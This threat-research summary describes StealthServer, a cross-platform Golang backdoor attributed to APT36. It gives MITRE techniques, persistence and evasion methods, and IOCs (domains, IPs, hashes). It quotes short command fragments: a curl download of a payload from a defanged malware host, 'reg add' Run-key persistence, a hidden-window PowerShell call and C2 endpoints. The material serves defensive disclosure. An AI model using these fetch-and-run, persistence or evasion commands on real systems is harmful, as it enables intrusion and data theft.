Threat Research

StealthServer APT36 Cross Platform Backdoor

Securonix
StealthServer APT36 Cross Platform Backdoor

StealthServer is a Golang-based cross-platform backdoor (Windows and Linux) that steals files and executes C2 commands while using junk code, anti-analysis checks, and diverse loaders (.desktop, malicious PPT macros) to evade detection. Observed infrastructure and lure themes targeting a South Asian country suggest possible links to APT36 through domain naming patterns and reuse of delivery tactics. #StealthServer #APT36

Keypoints

  • StealthServer is a Golang backdoor family supporting Windows and Linux with core capabilities to exfiltrate files and execute remote commands.
  • Operators distribute samples via social-engineered loaders: Windows via malicious PPT with macros, Linux via .desktop shortcuts that open decoy Google Drive PDFs and download hex-encoded payloads.
  • The malware employs heavy junk code insertion and function-level obfuscation to slow analysis and also includes anti-debugging, sandbox checks, VM detections, and mutex checks.
  • Multiple communication protocols are used across variants: Windows variants used TCP and WebSocket; Linux variants used HTTP and WebSocket; commands and heartbeat/registration messages use JSON (sometimes base64-encoded or XOR-obfuscated).
  • Persistence mechanisms differ by OS: Windows uses AppData copies, hidden attributes, registry Run keys, Startup shortcuts, and service/task creation; Linux uses systemd user services, ~/.bashrc/.profile edits, crontab and hidden copies under ~/.config.
  • Infrastructure and naming patterns (e.g., modindia.serveminecraft.net, modgovindia.space) and similar domain structures to prior reports link StealthServer activity to suspected APT36 operations targeting a South Asian country.
  • Collected IOCs include multiple domains, IPs, and file hashes (samples list provided), and evidence shows shared Golang build paths like D:/bossmaya/…/obfuscated*.go across variants.

MITRE Techniques

  • [T1204] User Execution – Loaders use malicious Office macros in PPT and .desktop shortcuts that open decoy PDFs to trick users into executing payloads (“the document contains a malicious macro … opens a PDF to mislead users”).
  • [T1105] Ingress Tool Transfer – Payloads are downloaded from remote servers (e.g., “curl … https://securestore[.]cv/ghg/Mt_dated_29.txt”, “https://filestore[.]space/…/nodejs”) and restored from hex to binary before execution.
  • [T1027] Obfuscated Files or Information – Samples insert large amounts of junk code and obfuscated function names to hinder analysis (“insert大量垃圾代码和垃圾函数来干扰分析人员…核心代码放在尾部”).
  • [T1055] Process Injection / Obfuscated Persistence (persistence techniques) – Implements persistence via startup folders, registry Run keys, scheduled tasks and systemd services to maintain execution across reboots (“把自身文件拷贝到%APPData… reg add …”, “将自身 ELF 文件拷贝到…并使用 systemctl 启动”).
  • [T1497] Virtualization/Sandbox Evasion – Detects virtualized/sandbox environments by searching for VM-related process names and directories and checking usernames (“tasklist … 检测是否存在下述沙箱和虚拟机相关字符串的进程”, checks for C:analysis, sandbox directories and specific usernames).
  • [T1086] PowerShell – Uses PowerShell commands to hide windows and perform actions (e.g., “cmd /C powershell -WindowStyle Hidden -Command exit” and scripts to create shortcuts in Startup).
  • [T1036] Masquerading – Files and shortcuts are named and presented as legitimate PDFs or system/update services to deceive users (“.desktop 文件伪装成 PDF 文档的快捷方式”, service named “System Update Service”).
  • [T1041] Exfiltration Over C2 Channel – Exfiltrates files via HTTP/WebSocket JSON endpoints with encrypted payloads and metadata headers (uploads via “/upload?last=true” with AES-GCM encryption and X-Nonce/X-Username headers).
  • [T1071] Application Layer Protocol – Uses HTTP, TCP sockets and WebSocket protocols for C2 communications (e.g., “Windows variants … TCP Socket … third variant switched to WebSocket”, “HTTP request http://modgovindia[.]space:4000/commands”).

Indicators of Compromise

  • [File Hash ] example malware samples – dc64c34ba92375f8dc8ae8cf90a1f535a0aa5a29fcf965af5ad4982cd16e9d71, 8f8da8861c368e74b9b5c1c59e64ef00690c5eff4a95e1b4fcf386973895bef1 (and 10 more hashes).
  • [Domain ] C2 and hosting – modindia.serveminecraft.net, modgovindia.space (used as C2 endpoints and health/commands paths).
  • [Domain ] additional infrastructure – seemysitelive.store, kavach.space, sinjita.store (used for WebSocket/TCP C2 or payload hosting).
  • [IP Address ] observed resolving/hosting – 101.99.94[.]109 (resolved from modindia/modgovindia domains), 45.155.54[.]122 (backup C2 IP listed).
  • [File Name ] lures/loaders – Meeting_Ltr_ID1543ops.pdf.desktop, PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop, “PM & Est Sanction Final 2025.ppam” (used to deliver payloads).
  • [Golang Build Path ] build artifacts / source hints – D:/bossmaya/newblkul/client/client_obfuscated.go, D:/bossmaya/newlinuxblkul/client/main_obfuscated_enhanced.go (shared development paths across samples).

Read more: https://blog.xlab.qianxin.com/apt-stealthserver-cn/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint